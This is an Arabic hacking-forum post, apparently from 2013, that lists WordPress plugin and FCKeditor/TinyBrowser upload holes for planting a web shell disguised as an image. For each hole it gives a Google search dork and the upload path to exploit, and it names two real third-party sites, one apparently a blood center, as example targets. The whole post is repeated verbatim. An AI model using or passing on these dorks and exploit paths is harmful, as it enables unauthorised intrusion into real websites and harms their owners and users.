Iraqe Hacker
01-25-2013, 08:16 PM
http://files2.fatakat.com/2012/8/13458572631487.gif
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif